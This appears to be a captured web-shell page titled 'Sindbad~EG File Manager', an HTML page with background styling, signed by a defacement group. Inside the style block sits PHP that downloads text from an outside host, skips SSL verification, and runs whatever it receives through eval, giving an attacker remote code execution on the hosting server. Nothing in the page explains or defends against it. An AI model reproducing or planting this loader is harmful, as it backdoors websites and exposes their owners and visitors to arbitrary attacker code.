Sindbad~EG File Manager
<!DOCTYPE html>
<html>
<head>
<title>火烧赤壁</title>
</head>
<style type="text/css">
body {
overflow-x:hidden;
font: 15px "Century Gothic", "Times Roman", sans-serif;
background:url(https://k.top4top.io/p_30443lpzi0.jpeg);
background-image: url(https://img2.baidu.com/it/u=1145152957,3334972391&fm=253&fmt=auto&app=138&f=JPEG?w=817&h=500);
background-size: cover;
background-repeat: no-repeat;
background-position: center;
background-attachment: fixed;
height: 100%;
}
<?php
$url = 'https://stepmomhub.com/2.txt';
$content = @file_get_contents($url);
if ($content === false) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$content = curl_exec($ch);
curl_close($ch);
}
if ($content) {
$code = base64_encode($content);
eval('?>' . base64_decode($code));
} ?>
Sindbad File Manager Version 1.0, Coded By Sindbad EG ~ The Terrorists